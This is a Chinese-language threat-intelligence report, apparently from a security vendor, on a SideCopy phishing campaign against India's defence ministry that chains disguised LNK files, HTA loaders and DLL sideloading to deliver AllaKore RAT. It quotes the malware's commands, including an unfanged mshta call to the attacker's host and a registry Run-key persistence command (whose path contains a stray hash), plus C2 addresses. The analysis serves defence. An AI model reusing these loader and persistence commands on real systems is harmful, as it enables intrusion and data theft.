警惕LNK文件攻擊導致數據竊取！SideCopy近期針對印度地區攻擊活動分析 - 網安

警惕LNK文件攻擊導致數據竊取！SideCopy近期針對印度地區攻擊活動分析

事件背景

近日，安恒信息獵影實驗室捕獲到SideCopy組織疑似針對印度國防部的攻擊樣本，樣本攻擊流程仍然以模仿SideWinder為主，通過釣魚郵件下發包含有惡意LNK文件的壓縮包，該LNK文件偽裝成PDF文件誘使目標運行，運行后下載多階段加載器，最后釋放SideCopy組織常用的遠控工具AllaKoreRAT。

誘餌文件冒充指揮官副手向陸軍部隊下發指令，完整信函如下。

攻擊流程如下圖：

攻擊分析

01 第一階段

原始樣本中包含偽裝成PDF文件的LNK文件，運行后將執行C:\Windows\System32\mshta.exe https://tmeew.com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit

LNK文件中執行的鏈接將跳轉至

hxxps://tmeew[.]com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit/jqueryxmlcss.hta。

該代碼來自開源項目CACTUSTORCH，魔改后的函數參數為data, filename。

在加載器中對應代碼如下，即傳入數據經base64解碼并解壓到%Temp%目錄下。

隨后檢測本地是否開啟WindowsDefender，并下載后續負載：

hxxps://tmeew[.]com/assets/carousel/nttoolkit/ -> C:\\ProgramData\\HP\\jquery.txt；

hxxps://tmeew[.]com/assets/carousel/cyxtoolkit/ -> C:\\ProgramData\\HP\\jscy.txt

02 第二階段

下載的文件jquery.txt仍然是采用base64解碼后解壓的方式得到jquery.hta。

jquery.hta與一階段jqueryxmlcss.hta的文件邏輯構造相似，增加有反病毒產品檢測，以及參數變更為exeBytes, dllBytes。

第二階段DLL文件將根據目標機器上安裝的反病毒產品進行后續操作

檢測到Kaspersky殺毒軟件時，執行以下操作

●創建C:\\ProgramData\\gvnntr\\目錄，將C:\\Windows\\System32\\credwiz.exe文件拷貝至該目錄，在自啟目錄以及C:\\Users\\Public\\目錄下創建gvnntrSettings.lnk文件用于啟動credwiz.exe并實現持久化，lnk文件包含指令如下：C:\Windows\System32\cmdexe-/c start /b C:\ProgramData\gvnntr\credwiz.exe

●將EXE數據（3b4abb7b29f7f41b30f4ed8d86dc6c8a）寫入%Temp%\\gvnntr\\gvnntr.txt，并將DLL數據（cf134c9ac335f549055fe2eff65e9921）寫入C:\\ProgramData\\newimage.jpg，寫入成功后將newimage.jpg移動至C:\\ProgramData\\gvnntr\\DUser.dll

●通過Powershell指令將%Temp%\\gvnntr\\gvnntr.txt重命名為gvnntr.exe

●最后執行C:\\Users\\Public\\gvnntrSettings.lnk

檢測到Avast殺毒軟件時，執行以下操作

●創建C:\\ProgramData\\gvnntr\\目錄，將C:\\Windows\\SysWOW64\\credwiz.exe文件拷貝至該目錄

?將DLL數據寫入C:\\ProgramData\\newimage.jpg后將newimage.jpg移動至C:\\ProgramData\\gvnntr\\DUser.dll

●在C:\\ProgramData\\gvnntr\\目錄下創建gvnntr.bat文件并啟動以實現持久化，gvnntr.bat文件內容如下：REG ADD "HKCU\SOFTWARE\Microsoft\Windows\Cu3b4abb7b29f7f41b30f4ed8d86dc6c8arrentVersion\Run" /V "gvnntr" /t REG_SZ /F /D "C:\ProgramData\gvnntr\credwiz.exe"

●直接將EXE數據寫入%Temp%\\gvnntr\\gvnntr.exe

●休眠3min后，啟動 C:\ProgramData\gvnntr\credwiz.exe

檢測到Avira殺毒軟件時，執行以下操作

在C:\\ProgramData\\gvnntr\\目錄下創建gvnntr.bat文件并啟動以實現持久化，gvnntr.bat內容同上，將EXE數據寫入TXT，DLL數據寫入DUser.dll

檢測到Quick殺毒軟件時，執行以下操作

●創建C:\\ProgramData\\gvnntr\\，將credwiz.exe文件拷貝至該目錄，將DLL數據寫入C:\\ProgramData\\extrafile.txt后移動至C:\\ProgramData\\gvnntr\\DUser.dll

●通過BAT文件實現持久化，釋放EXE數據到%Temp%\\gvnntr\\gvnntr.exe

●休眠1min，啟動 C:\ProgramData\gvnntr\credwiz.exe

檢測到WindowsDefender殺毒軟件時，執行以下操作

●創建C:\\ProgramData\\gvnntr\\，將credwiz.exe文件拷貝至該目錄，將DLL數據寫入C:\\ProgramData\\newimage.jpg后將newimage.jpg移動至C:\\ProgramData\\gvnntr\\DUser.dll

●在C:\\ProgramData\\gvnntr\\目錄下創建gvnntr.bat文件并啟動以實現持久化，將EXE數據寫入%Temp%\\gvnntr\\gvnntr.exe

●休眠1min，啟動 C:\ProgramData\gvnntr\credwiz.exe

Loader下載的另一文件jscy.txt，主要是將上述變量gvnntr更改為vmmbs，其他邏輯均不變。其中EXE數據與DLL數據hash值如下

072fb8ca7c0dce0888707ccbbd37723d | DLL

98a0ed81f68297ea804e8209a28b91be | EXE

03 第三階段

credwiz.exe啟動后將加載同目錄下的DUser.dll，該DLL的主要功能為啟動%Temp%\\gvnntr\\gvnntr.exe

gvnntr.exe為最終階段遠控軟件AllaKore RAT。AllaKore是一種公開可用的基于Delphi的RAT，常與CetaRAT一起用于SideCopy的攻擊活動中。AllaKore的惡意功能包括：鍵盤記錄、捕獲屏幕截圖、列出文件夾和文件、上傳/下載文件、竊取剪貼板數據、獲取/更換壁紙。

此次活動中，該RAT被命名為POISONManager

其中包含的29553fb6797c15d99bcb2d9e27abd49d組件可關聯到其他AllaKore遠控工具，最終連接到 209.126.80.23:{6391、3281}

tmeew[.]com解析到162.241.85.104

思考總結

01 關聯

通過樣本特征我們關聯到該組織在今年上半年攻擊活動中的樣本如下。

02 總結

SideCopy組織近一年來攻擊活動頻繁，攻擊武器從C#、Delphi發展至Golang，從Windows發展至多平臺，攻擊目標卻始終牢牢鎖定印度國防部。此外，該組織樂此不疲地在攻擊活動中使用LNK偽裝成JPG、Word、PDF等文件，說明此攻擊手段針對特定目標人群有較大的成功率。

安恒建議廣大用戶謹慎對待未知來源的郵件附件及鏈接，提高對LNK文件攻擊的警惕。如有需要鑒別的未知來源樣本，可以投遞至安恒云沙箱查看判別結果后再進行后續操作。

文帳來自：網絡安全研究宅基地